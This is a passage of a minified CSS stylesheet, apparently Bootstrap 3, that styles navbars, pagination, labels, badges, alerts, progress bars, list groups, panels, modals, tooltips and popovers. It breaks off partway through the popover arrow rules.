.navbar-default .navbar-toggle { border-color: #ddd; } /*.navbar-default .navbar-toggle:hover, .navbar-default .navbar-toggle:focus { background-color: #ddd; }*/ .navbar-default .navbar-toggle .icon-bar { background-color: #888; } .navbar-default .navbar-collapse, .navbar-default .navbar-form { border-color: #e7e7e7; } /*.navbar-default .navbar-nav > .open > a, .navbar-default .navbar-nav > .open > a:hover, .navbar-default .navbar-nav > .open > a:focus { color: #555; background-color: #e7e7e7; }*/ @media (max-width: 767px) { .navbar-default .navbar-nav .open .dropdown-menu > li > a { color: #777; } .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus { color: #333; background-color: transparent; } /*.navbar-default .navbar-nav .open .dropdown-menu > .active > a, .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus { color: #555; background-color: #e7e7e7; }*/ .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a, .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus { color: #ccc; background-color: transparent; } } .navbar-default .navbar-link { color: #777; } .navbar-default .navbar-link:hover { color: #333; } .navbar-inverse { background-color: #222; border-color: #080808; } .navbar-inverse .navbar-brand { color: #999; } .navbar-inverse .navbar-brand:hover, .navbar-inverse .navbar-brand:focus { color: #fff; background-color: transparent; } .navbar-inverse .navbar-text { color: #999; } .navbar-inverse .navbar-nav > li > a { color: #999; } .navbar-inverse .navbar-nav > li > a:hover, .navbar-inverse .navbar-nav > li > a:focus { color: #fff; background-color: transparent; } .navbar-inverse .navbar-nav > .active > a, .navbar-inverse .navbar-nav > .active > a:hover, .navbar-inverse .navbar-nav > .active > a:focus { color: #fff; background-color: #080808; } .navbar-inverse .navbar-nav > .disabled > a, .navbar-inverse .navbar-nav > .disabled > a:hover, .navbar-inverse .navbar-nav > .disabled > a:focus { color: #444; background-color: transparent; } .navbar-inverse .navbar-toggle { border-color: #333; } .navbar-inverse .navbar-toggle:hover, .navbar-inverse .navbar-toggle:focus { background-color: #333; } .navbar-inverse .navbar-toggle .icon-bar { background-color: #fff; } .navbar-inverse .navbar-collapse, .navbar-inverse .navbar-form { border-color: #101010; } .navbar-inverse .navbar-nav > .open > a, .navbar-inverse .navbar-nav > .open > a:hover, .navbar-inverse .navbar-nav > .open > a:focus { color: #fff; background-color: #080808; } @media (max-width: 767px) { .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header { border-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu .divider { background-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu > li > a { color: #999; } .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus { color: #fff; background-color: transparent; } .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a, .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus { color: #fff; background-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a, .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus { color: #444; background-color: transparent; } } .navbar-inverse .navbar-link { color: #999; } .navbar-inverse .navbar-link:hover { color: #fff; } .breadcrumb { padding: 8px 15px; margin-bottom: 20px; list-style: none; background-color: #f5f5f5; border-radius: 4px; } .breadcrumb > li { display: inline-block; } .breadcrumb > li + li:before { padding: 0 5px; color: #ccc; content: "/\00a0"; } .breadcrumb > .active { color: #999; } .pagination { display: inline-block; padding-left: 0; margin: 20px 0; border-radius: 4px; } .pagination > li { display: inline; } .pagination > li > a, .pagination > li > span { position: relative; float: left; padding: 6px 12px; margin-left: -1px; line-height: 1.428571429; color: #428bca; text-decoration: none; background-color: #fff; border: 1px solid #ddd; } .pagination > li:first-child > a, .pagination > li:first-child > span { margin-left: 0; border-top-left-radius: 4px; border-bottom-left-radius: 4px; } .pagination > li:last-child > a, .pagination > li:last-child > span { border-top-right-radius: 4px; border-bottom-right-radius: 4px; } .pagination > li > a:hover, .pagination > li > span:hover, .pagination > li > a:focus, .pagination > li > span:focus { color: #2a6496; background-color: #eee; border-color: #ddd; } .pagination > .active > a, .pagination > .active > span, .pagination > .active > a:hover, .pagination > .active > span:hover, .pagination > .active > a:focus, .pagination > .active > span:focus { z-index: 2; color: #fff; cursor: default; background-color: #428bca; border-color: #428bca; } .pagination > .disabled > span, .pagination > .disabled > span:hover, .pagination > .disabled > span:focus, .pagination > .disabled > a, .pagination > .disabled > a:hover, .pagination > .disabled > a:focus { color: #999; cursor: not-allowed; background-color: #fff; border-color: #ddd; } .pagination-lg > li > a, .pagination-lg > li > span { padding: 10px 16px; font-size: 18px; } .pagination-lg > li:first-child > a, .pagination-lg > li:first-child > span { border-top-left-radius: 6px; border-bottom-left-radius: 6px; } .pagination-lg > li:last-child > a, .pagination-lg > li:last-child > span { border-top-right-radius: 6px; border-bottom-right-radius: 6px; } .pagination-sm > li > a, .pagination-sm > li > span { padding: 5px 10px; font-size: 12px; } .pagination-sm > li:first-child > a, .pagination-sm > li:first-child > span { border-top-left-radius: 3px; border-bottom-left-radius: 3px; } .pagination-sm > li:last-child > a, .pagination-sm > li:last-child > span { border-top-right-radius: 3px; border-bottom-right-radius: 3px; } .pager { padding-left: 0; margin: 20px 0; text-align: center; list-style: none; } .pager li { display: inline; } .pager li > a, .pager li > span { display: inline-block; padding: 5px 14px; background-color: #fff; border: 1px solid #ddd; border-radius: 15px; } .pager li > a:hover, .pager li > a:focus { text-decoration: none; background-color: #eee; } .pager .next > a, .pager .next > span { float: right; } .pager .previous > a, .pager .previous > span { float: left; } .pager .disabled > a, .pager .disabled > a:hover, .pager .disabled > a:focus, .pager .disabled > span { color: #999; cursor: not-allowed; background-color: #fff; } .label { display: inline; padding: .2em .6em .3em; font-size: 75%; font-weight: bold; line-height: 1; color: #fff; text-align: center; white-space: nowrap; vertical-align: baseline; border-radius: .25em; } .label[href]:hover, .label[href]:focus { color: #fff; text-decoration: none; cursor: pointer; } .label:empty { display: none; } .btn .label { position: relative; top: -1px; } .label-default { background-color: #999; } .label-default[href]:hover, .label-default[href]:focus { background-color: #808080; } .label-primary { background-color: #428bca; } .label-primary[href]:hover, .label-primary[href]:focus { background-color: #3071a9; } .label-success { background-color: #5cb85c; } .label-success[href]:hover, .label-success[href]:focus { background-color: #449d44; } .label-info { background-color: #5bc0de; } .label-info[href]:hover, .label-info[href]:focus { background-color: #31b0d5; } .label-warning { background-color: #f0ad4e; } .label-warning[href]:hover, .label-warning[href]:focus { background-color: #ec971f; } .label-danger { background-color: #d9534f; } .label-danger[href]:hover, .label-danger[href]:focus { background-color: #c9302c; } .badge { display: inline-block; min-width: 10px; padding: 3px 7px; font-size: 12px; font-weight: bold; line-height: 1; color: #fff; text-align: center; white-space: nowrap; vertical-align: baseline; background-color: #999; border-radius: 10px; } .badge:empty { display: none; } .btn .badge { position: relative; top: -1px; } .btn-xs .badge { top: 0; padding: 1px 5px; } a.badge:hover, a.badge:focus { color: #fff; text-decoration: none; cursor: pointer; } a.list-group-item.active > .badge, .nav-pills > .active > a > .badge { color: #428bca; background-color: #fff; } .nav-pills > li > a > .badge { margin-left: 3px; } .jumbotron { padding: 30px; margin-bottom: 30px; color: inherit; background-color: #eee; } .jumbotron h1, .jumbotron .h1 { color: inherit; } .jumbotron p { margin-bottom: 15px; font-size: 21px; font-weight: 200; } .container .jumbotron { border-radius: 6px; } .jumbotron .container { max-width: 100%; } @media screen and (min-width: 768px) { .jumbotron { padding-top: 48px; padding-bottom: 48px; } .container .jumbotron { padding-right: 60px; padding-left: 60px; } .jumbotron h1, .jumbotron .h1 { font-size: 63px; } } .thumbnail { display: block; padding: 4px; margin-bottom: 20px; line-height: 1.428571429; background-color: #fff; border: 1px solid #ddd; border-radius: 4px; -webkit-transition: all .2s ease-in-out; transition: all .2s ease-in-out; } .thumbnail > img, .thumbnail a > img { display: block; max-width: 100%; height: auto; margin-right: auto; margin-left: auto; } a.thumbnail:hover, a.thumbnail:focus, a.thumbnail.active { border-color: #428bca; } .thumbnail .caption { padding: 9px; color: #333; } .alert { padding: 15px; margin-bottom: 20px; border: 1px solid transparent; border-radius: 4px; } .alert h4 { margin-top: 0; color: inherit; } .alert .alert-link { font-weight: bold; } .alert > p, .alert > ul { margin-bottom: 0; } .alert > p + p { margin-top: 5px; } .alert-dismissable { padding-right: 35px; } .alert-dismissable .close { position: relative; top: -2px; right: -21px; color: inherit; } .alert-success { color: #3c763d; background-color: #dff0d8; border-color: #d6e9c6; } .alert-success hr { border-top-color: #c9e2b3; } .alert-success .alert-link { color: #2b542c; } .alert-info { color: #31708f; background-color: #d9edf7; border-color: #bce8f1; } .alert-info hr { border-top-color: #a6e1ec; } .alert-info .alert-link { color: #245269; } .alert-warning { color: #8a6d3b; background-color: #fcf8e3; border-color: #faebcc; } .alert-warning hr { border-top-color: #f7e1b5; } .alert-warning .alert-link { color: #66512c; } .alert-danger { color: #a94442; background-color: #f2dede; border-color: #ebccd1; } .alert-danger hr { border-top-color: #e4b9c0; } .alert-danger .alert-link { color: #843534; } @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } .progress { height: 20px; margin-bottom: 20px; overflow: hidden; background-color: #f5f5f5; border-radius: 4px; -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, .1); box-shadow: inset 0 1px 2px rgba(0, 0, 0, .1); } .progress-bar { float: left; width: 0; height: 100%; font-size: 12px; line-height: 20px; color: #fff; text-align: center; background-color: #428bca; -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .15); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .15); -webkit-transition: width .6s ease; transition: width .6s ease; } .progress-striped .progress-bar { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-size: 40px 40px; } .progress.active .progress-bar { -webkit-animation: progress-bar-stripes 2s linear infinite; animation: progress-bar-stripes 2s linear infinite; } .progress-bar-success { background-color: #5cb85c; } .progress-striped .progress-bar-success { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .progress-bar-info { background-color: #5bc0de; } .progress-striped .progress-bar-info { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .progress-bar-warning { background-color: #f0ad4e; } .progress-striped .progress-bar-warning { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .progress-bar-danger { background-color: #d9534f; } .progress-striped .progress-bar-danger { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .media, .media-body { overflow: hidden; zoom: 1; } .media, .media .media { margin-top: 15px; } .media:first-child { margin-top: 0; } .media-object { display: block; } .media-heading { margin: 0 0 5px; } .media > .pull-left { margin-right: 10px; } .media > .pull-right { margin-left: 10px; } .media-list { padding-left: 0; list-style: none; } .list-group { padding-left: 0; margin-bottom: 20px; } .list-group-item { position: relative; display: block; padding: 10px 15px; margin-bottom: -1px; background-color: #fff; border: 1px solid #ddd; } .list-group-item:first-child { border-top-left-radius: 4px; border-top-right-radius: 4px; } .list-group-item:last-child { margin-bottom: 0; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; } .list-group-item > .badge { float: right; } .list-group-item > .badge + .badge { margin-right: 5px; } a.list-group-item { color: #555; } a.list-group-item .list-group-item-heading { color: #333; } a.list-group-item:hover, a.list-group-item:focus { text-decoration: none; background-color: #f5f5f5; } a.list-group-item.active, a.list-group-item.active:hover, a.list-group-item.active:focus { z-index: 2; color: #fff; background-color: #428bca; border-color: #428bca; } a.list-group-item.active .list-group-item-heading, a.list-group-item.active:hover .list-group-item-heading, a.list-group-item.active:focus .list-group-item-heading { color: inherit; } a.list-group-item.active .list-group-item-text, a.list-group-item.active:hover .list-group-item-text, a.list-group-item.active:focus .list-group-item-text { color: #e1edf7; } .list-group-item-success { color: #3c763d; background-color: #dff0d8; } a.list-group-item-success { color: #3c763d; } a.list-group-item-success .list-group-item-heading { color: inherit; } a.list-group-item-success:hover, a.list-group-item-success:focus { color: #3c763d; background-color: #d0e9c6; } a.list-group-item-success.active, a.list-group-item-success.active:hover, a.list-group-item-success.active:focus { color: #fff; background-color: #3c763d; border-color: #3c763d; } .list-group-item-info { color: #31708f; background-color: #d9edf7; } a.list-group-item-info { color: #31708f; } a.list-group-item-info .list-group-item-heading { color: inherit; } a.list-group-item-info:hover, a.list-group-item-info:focus { color: #31708f; background-color: #c4e3f3; } a.list-group-item-info.active, a.list-group-item-info.active:hover, a.list-group-item-info.active:focus { color: #fff; background-color: #31708f; border-color: #31708f; } .list-group-item-warning { color: #8a6d3b; background-color: #fcf8e3; } a.list-group-item-warning { color: #8a6d3b; } a.list-group-item-warning .list-group-item-heading { color: inherit; } a.list-group-item-warning:hover, a.list-group-item-warning:focus { color: #8a6d3b; background-color: #faf2cc; } a.list-group-item-warning.active, a.list-group-item-warning.active:hover, a.list-group-item-warning.active:focus { color: #fff; background-color: #8a6d3b; border-color: #8a6d3b; } .list-group-item-danger { color: #a94442; background-color: #f2dede; } a.list-group-item-danger { color: #a94442; } a.list-group-item-danger .list-group-item-heading { color: inherit; } a.list-group-item-danger:hover, a.list-group-item-danger:focus { color: #a94442; background-color: #ebcccc; } a.list-group-item-danger.active, a.list-group-item-danger.active:hover, a.list-group-item-danger.active:focus { color: #fff; background-color: #a94442; border-color: #a94442; } .list-group-item-heading { margin-top: 0; margin-bottom: 5px; } .list-group-item-text { margin-bottom: 0; line-height: 1.3; } .panel { margin-bottom: 20px; background-color: #fff; border: 1px solid transparent; border-radius: 4px; -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .05); box-shadow: 0 1px 1px rgba(0, 0, 0, .05); } .panel-body { padding: 15px; } .panel > .list-group { margin-bottom: 0; } .panel > .list-group .list-group-item { border-width: 1px 0; border-radius: 0; } .panel > .list-group .list-group-item:first-child { border-top: 0; } .panel > .list-group .list-group-item:last-child { border-bottom: 0; } .panel > .list-group:first-child .list-group-item:first-child { border-top-left-radius: 3px; border-top-right-radius: 3px; } .panel > .list-group:last-child .list-group-item:last-child { border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel-heading + .list-group .list-group-item:first-child { border-top-width: 0; } .panel > .table, .panel > .table-responsive > .table { margin-bottom: 0; } .panel > .table:first-child > thead:first-child > tr:first-child td:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child td:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child, .panel > .table:first-child > thead:first-child > tr:first-child th:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child th:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child { border-top-left-radius: 3px; } .panel > .table:first-child > thead:first-child > tr:first-child td:last-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child, .panel > .table:first-child > tbody:first-child > tr:first-child td:last-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child, .panel > .table:first-child > thead:first-child > tr:first-child th:last-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child, .panel > .table:first-child > tbody:first-child > tr:first-child th:last-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child { border-top-right-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child td:first-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child, .panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child, .panel > .table:last-child > tbody:last-child > tr:last-child th:first-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child, .panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child { border-bottom-left-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child td:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child, .panel > .table:last-child > tbody:last-child > tr:last-child th:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child { border-bottom-right-radius: 3px; } .panel > .panel-body + .table, .panel > .panel-body + .table-responsive { border-top: 1px solid #ddd; } .panel > .table > tbody:first-child > tr:first-child th, .panel > .table > tbody:first-child > tr:first-child td { border-top: 0; } .panel > .table-bordered, .panel > .table-responsive > .table-bordered { border: 0; } .panel > .table-bordered > thead > tr > th:first-child, .panel > .table-responsive > .table-bordered > thead > tr > th:first-child, .panel > .table-bordered > tbody > tr > th:first-child, .panel > .table-responsive > .table-bordered > tbody > tr > th:first-child, .panel > .table-bordered > tfoot > tr > th:first-child, .panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child, .panel > .table-bordered > thead > tr > td:first-child, .panel > .table-responsive > .table-bordered > thead > tr > td:first-child, .panel > .table-bordered > tbody > tr > td:first-child, .panel > .table-responsive > .table-bordered > tbody > tr > td:first-child, .panel > .table-bordered > tfoot > tr > td:first-child, .panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child { border-left: 0; } .panel > .table-bordered > thead > tr > th:last-child, .panel > .table-responsive > .table-bordered > thead > tr > th:last-child, .panel > .table-bordered > tbody > tr > th:last-child, .panel > .table-responsive > .table-bordered > tbody > tr > th:last-child, .panel > .table-bordered > tfoot > tr > th:last-child, .panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child, .panel > .table-bordered > thead > tr > td:last-child, .panel > .table-responsive > .table-bordered > thead > tr > td:last-child, .panel > .table-bordered > tbody > tr > td:last-child, .panel > .table-responsive > .table-bordered > tbody > tr > td:last-child, .panel > .table-bordered > tfoot > tr > td:last-child, .panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child { border-right: 0; } .panel > .table-bordered > thead > tr:first-child > th, .panel > .table-responsive > .table-bordered > thead > tr:first-child > th, .panel > .table-bordered > tbody > tr:first-child > th, .panel > .table-responsive > .table-bordered > tbody > tr:first-child > th, .panel > .table-bordered > tfoot > tr:first-child > th, .panel > .table-responsive > .table-bordered > tfoot > tr:first-child > th, .panel > .table-bordered > thead > tr:first-child > td, .panel > .table-responsive > .table-bordered > thead > tr:first-child > td, .panel > .table-bordered > tbody > tr:first-child > td, .panel > .table-responsive > .table-bordered > tbody > tr:first-child > td, .panel > .table-bordered > tfoot > tr:first-child > td, .panel > .table-responsive > .table-bordered > tfoot > tr:first-child > td { border-top: 0; } .panel > .table-bordered > thead > tr:last-child > th, .panel > .table-responsive > .table-bordered > thead > tr:last-child > th, .panel > .table-bordered > tbody > tr:last-child > th, .panel > .table-responsive > .table-bordered > tbody > tr:last-child > th, .panel > .table-bordered > tfoot > tr:last-child > th, .panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th, .panel > .table-bordered > thead > tr:last-child > td, .panel > .table-responsive > .table-bordered > thead > tr:last-child > td, .panel > .table-bordered > tbody > tr:last-child > td, .panel > .table-responsive > .table-bordered > tbody > tr:last-child > td, .panel > .table-bordered > tfoot > tr:last-child > td, .panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td { border-bottom: 0; } .panel > .table-responsive { margin-bottom: 0; border: 0; } .panel-heading { padding: 10px 15px; border-bottom: 1px solid transparent; border-top-left-radius: 3px; border-top-right-radius: 3px; } .panel-heading > .dropdown .dropdown-toggle { color: inherit; } .panel-title { margin-top: 0; margin-bottom: 0; font-size: 16px; color: inherit; } .panel-title > a { color: inherit; } .panel-footer { padding: 10px 15px; background-color: #f5f5f5; border-top: 1px solid #ddd; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel-group { margin-bottom: 20px; } .panel-group .panel { margin-bottom: 0; overflow: hidden; border-radius: 4px; } .panel-group .panel + .panel { margin-top: 5px; } .panel-group .panel-heading { border-bottom: 0; } .panel-group .panel-heading + .panel-collapse .panel-body { border-top: 1px solid #ddd; } .panel-group .panel-footer { border-top: 0; } .panel-group .panel-footer + .panel-collapse .panel-body { border-bottom: 1px solid #ddd; } .panel-default { border-color: #ddd; } .panel-default > .panel-heading { color: #333; background-color: #f5f5f5; border-color: #ddd; } .panel-default > .panel-heading + .panel-collapse .panel-body { border-top-color: #ddd; } .panel-default > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #ddd; } .panel-primary { border-color: #428bca; } .panel-primary > .panel-heading { color: #fff; background-color: #428bca; border-color: #428bca; } .panel-primary > .panel-heading + .panel-collapse .panel-body { border-top-color: #428bca; } .panel-primary > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #428bca; } .panel-success { border-color: #d6e9c6; } .panel-success > .panel-heading { color: #3c763d; background-color: #dff0d8; border-color: #d6e9c6; } .panel-success > .panel-heading + .panel-collapse .panel-body { border-top-color: #d6e9c6; } .panel-success > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #d6e9c6; } .panel-info { border-color: #bce8f1; } .panel-info > .panel-heading { color: #31708f; background-color: #d9edf7; border-color: #bce8f1; } .panel-info > .panel-heading + .panel-collapse .panel-body { border-top-color: #bce8f1; } .panel-info > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #bce8f1; } .panel-warning { border-color: #faebcc; } .panel-warning > .panel-heading { color: #8a6d3b; background-color: #fcf8e3; border-color: #faebcc; } .panel-warning > .panel-heading + .panel-collapse .panel-body { border-top-color: #faebcc; } .panel-warning > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #faebcc; } .panel-danger { border-color: #ebccd1; } .panel-danger > .panel-heading { color: #a94442; background-color: #f2dede; border-color: #ebccd1; } .panel-danger > .panel-heading + .panel-collapse .panel-body { border-top-color: #ebccd1; } .panel-danger > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #ebccd1; } .well { min-height: 20px; padding: 19px; margin-bottom: 20px; background-color: #f5f5f5; border: 1px solid #e3e3e3; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .05); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .05); } .well blockquote { border-color: #ddd; border-color: rgba(0, 0, 0, .15); } .well-lg { padding: 24px; border-radius: 6px; } .well-sm { padding: 9px; border-radius: 3px; } .close { float: right; font-size: 21px; font-weight: bold; line-height: 1; color: #000; text-shadow: 0 1px 0 #fff; filter: alpha(opacity=20); opacity: .2; } .close:hover, .close:focus { color: #000; text-decoration: none; cursor: pointer; filter: alpha(opacity=50); opacity: .5; } button.close { -webkit-appearance: none; padding: 0; cursor: pointer; background: transparent; border: 0; } .modal-open { overflow: hidden; } .modal { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1050; display: none; overflow: auto; overflow-y: scroll; -webkit-overflow-scrolling: touch; outline: 0; } .modal.fade .modal-dialog { -webkit-transition: -webkit-transform .3s ease-out; -moz-transition: -moz-transform .3s ease-out; -o-transition: -o-transform .3s ease-out; transition: transform .3s ease-out; -webkit-transform: translate(0, -25%); -ms-transform: translate(0, -25%); transform: translate(0, -25%); } .modal.in .modal-dialog { -webkit-transform: translate(0, 0); -ms-transform: translate(0, 0); transform: translate(0, 0); } .modal-dialog { position: relative; width: auto; margin: 10px; } .modal-content { position: relative; background-color: #fff; background-clip: padding-box; border: 1px solid #999; border: 1px solid rgba(0, 0, 0, .2); border-radius: 6px; outline: none; -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, .5); box-shadow: 0 3px 9px rgba(0, 0, 0, .5); } .modal-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1040; background-color: #000; } .modal-backdrop.fade { filter: alpha(opacity=0); opacity: 0; } .modal-backdrop.in { filter: alpha(opacity=50); opacity: .5; } .modal-header { min-height: 16.428571429px; padding: 15px; border-bottom: 1px solid #e5e5e5; } .modal-header .close { margin-top: -2px; } .modal-title { margin: 0; line-height: 1.428571429; } .modal-body { position: relative; padding: 20px; } .modal-footer { padding: 19px 20px 20px; margin-top: 15px; text-align: right; border-top: 1px solid #e5e5e5; } .modal-footer .btn + .btn { margin-bottom: 0; margin-left: 5px; } .modal-footer .btn-group .btn + .btn { margin-left: -1px; } .modal-footer .btn-block + .btn-block { margin-left: 0; } @media (min-width: 768px) { .modal-dialog { width: 600px; margin: 30px auto; } .modal-content { -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, .5); box-shadow: 0 5px 15px rgba(0, 0, 0, .5); } .modal-sm { width: 300px; } .modal-lg { width: 900px; } } .tooltip { position: absolute; z-index: 1030; display: block; font-size: 12px; line-height: 1.4; visibility: visible; filter: alpha(opacity=0); opacity: 0; } .tooltip.in { filter: alpha(opacity=90); opacity: .9; } .tooltip.top { padding: 5px 0; margin-top: -3px; } .tooltip.right { padding: 0 5px; margin-left: 3px; } .tooltip.bottom { padding: 5px 0; margin-top: 3px; } .tooltip.left { padding: 0 5px; margin-left: -3px; } .tooltip-inner { max-width: 200px; padding: 3px 8px; color: #fff; text-align: center; text-decoration: none; background-color: #000; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.top-left .tooltip-arrow { bottom: 0; left: 5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.top-right .tooltip-arrow { right: 5px; bottom: 0; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .tooltip.bottom-left .tooltip-arrow { top: 0; left: 5px; border-width: 0 5px 5px; border-bottom-color: #000; } .tooltip.bottom-right .tooltip-arrow { top: 0; right: 5px; border-width: 0 5px 5px; border-bottom-color: #000; } .popover { position: absolute; top: 0; left: 0; z-index: 1010; display: none; max-width: 276px; padding: 1px; text-align: left; white-space: normal; background-color: #fff; background-clip: padding-box; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, .2); border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, .2); box-shadow: 0 5px 10px rgba(0, 0, 0, .2); } .popover.top { margin-top: -10px; } .popover.right { margin-left: 10px; } .popover.bottom { margin-top: 10px; } .popover.left { margin-left: -10px; } .popover-title { padding: 8px 14px; margin: 0; font-size: 14px; font-weight: normal; line-height: 18px; background-color: #f7f7f7; border-bottom: 1px solid #ebebeb; border-radius: 5px 5px 0 0; } .popover-content { padding: 9px 14px; } .popover .arrow, .popover .arrow:after { position: absolute; display: block; width: 0; height: 0; border-color: transparent; border-style: solid; } .popover .arrow { border-width: 11px; } .popover .arrow:after { content: ""; border-width: 10px; } .popover.top .arrow { bottom: -11px; left: 50%; margin-left: -11px; border-top-color: #999; border-top-color: rgba(0, 0, 0, .25); border-bottom-width: 0; } .popover.top .arrow:after { bottom: 1px; margin-left: -10px; content: " "; border-top-color: #fff; border-bottom-width: 0; } .popover.right .arrow { top: 50%; left: -11px; margin-top: -11px; border-right-color: #999; border-right-color: rgba(0, 0, 0, .25); border-left-width: 0; } .popover.right .arrow:after { bottom: -10px; left: 1px; 